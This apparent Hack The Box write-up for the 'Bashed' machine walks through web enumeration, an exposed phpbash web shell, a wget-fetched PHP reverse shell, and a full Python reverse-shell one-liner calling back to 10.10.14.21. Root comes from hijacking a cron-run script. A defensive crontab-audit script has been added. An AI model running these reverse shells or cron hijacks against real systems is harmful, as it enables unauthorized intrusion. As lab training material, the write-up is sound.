Bashed
HTB 8. Bashed
nmap -A -T4 -p- 10.10.10.68 shows port 80 with Apache httpd 2.4.18 (Ubuntu). searchsploit apache 2.4 reveals a local apache_ctl exploit.
Going to the website at 10.10.10.68 and looking at its content shows that 10.10.10.68/uploads exists. dirbuster time, with the medium wordlist, which reveals several folders. Viewing the source code of the pages shows nothing. dirbuster found dev/phpbash.php. Go to 10.10.10.68 and launch phpbash.php, which opens a web terminal.
whoami is www-data, so let's get the user flag: cat /home/arrexel/user.txt. Test sudo -l and history, which show we can become the scriptmanager user without a password. Can't change to scriptmanager because we are in a webshell without a tty.
cd /var/www/html/uploads/ and upload a payload. Let's try the pentestmonkey reverse shell instead of metasploit. Download and extract it, then edit $ip and $port to our IP and port 1234. Start a web server with python -m SimpleHTTPServer 80 and run wget http://10.10.14.21/rev.php on the target. Start netcat with nc -nvlp 1234. Go to 10.10.10.68/uploads/rev.php to execute it and connect.
Still can't access a tty, so search for a tty escape and go to . Just go down the list and try the options. Try python -c 'import pty; pty.spawn("/bin/bash")' and now we are in bash.
sudo su scriptmanager does not work, so let's try running a command as the user: sudo -u scriptmanager /bin/bash. whoami is scriptmanager and history is empty.
ls -la / shows scriptmanager owns /scripts. cd scripts and ls -la shows test.py and test.txt.
The modification time of test.txt changes every minute, so a cronjob is running test.py every minute as root. Let's change test.py so it performs malicious actions.
Search for a python reverse shell and use the . Use import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.21",2345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]); (-i is interactive mode) and download it to the target. Start listening with nc -nvlp 2345 and wait for the shell.
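A defender-side audit for the misconfiguration this step abuses (a root cron job running a file that a non-root user owns), added here as an example and not part of the original writeup: it parses /etc/crontab-style entries and flags every absolute path in a root job that a non-root user could modify. The crontab text and stat results are constructed samples, and the function names are this example's own.

```python
import os, re, stat
from types import SimpleNamespace
# /etc/crontab format: five schedule fields, the user to run as, then the command.
CRON_RE = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def parse_system_crontab(text):
    """Yield (user, command) per job line; comments and VAR=value lines are skipped."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_RE.match(line)
        if m:
            yield m.group("user"), m.group("cmd")

def weak_ownership(st, run_as):
    """Why a file run as root is risky: non-root owner or group/world write bit. None if fine."""
    if run_as != "root":
        return None
    if st.st_uid != 0:
        return "owned by uid %d, not root" % st.st_uid
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "group/world writable"
    return None

def audit(crontab_text, stat_fn=os.stat):
    """Return (user, path, reason) for each path in a root job that a non-root user could edit."""
    findings = []
    for user, cmd in parse_system_crontab(crontab_text):
        for token in cmd.split():
            if not token.startswith("/"):
                continue  # interpreter names and plain arguments are not files to check
            try:
                st = stat_fn(token)
            except OSError:
                continue
            reason = weak_ownership(st, user)
            if reason:
                findings.append((user, token, reason))
    return findings

# Constructed sample modelled on the box: root's job runs a script owned by scriptmanager (uid 1001).
SAMPLE_CRONTAB = "SHELL=/bin/sh\n* * * * * root python /scripts/test.py\n*/5 * * * * scriptmanager /scripts/cleanup.sh\n0 3 * * * root /usr/bin/apt-get update\n"
SAMPLE_STAT = {  # constructed stat results standing in for os.stat on the target
    "/scripts/test.py": SimpleNamespace(st_uid=1001, st_mode=0o100755),
    "/scripts/cleanup.sh": SimpleNamespace(st_uid=1001, st_mode=0o100755),
    "/usr/bin/apt-get": SimpleNamespace(st_uid=0, st_mode=0o100755),
}
def demo():
    return audit(SAMPLE_CRONTAB, stat_fn=lambda p: SAMPLE_STAT[p])
```

Running audit(open("/etc/crontab").read()) on a real host uses os.stat and reports only the root jobs whose script files are not root-owned or are group/world writable.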
Someone exploited this with CVE-2017-16995, found after running linux-exploit-suggester.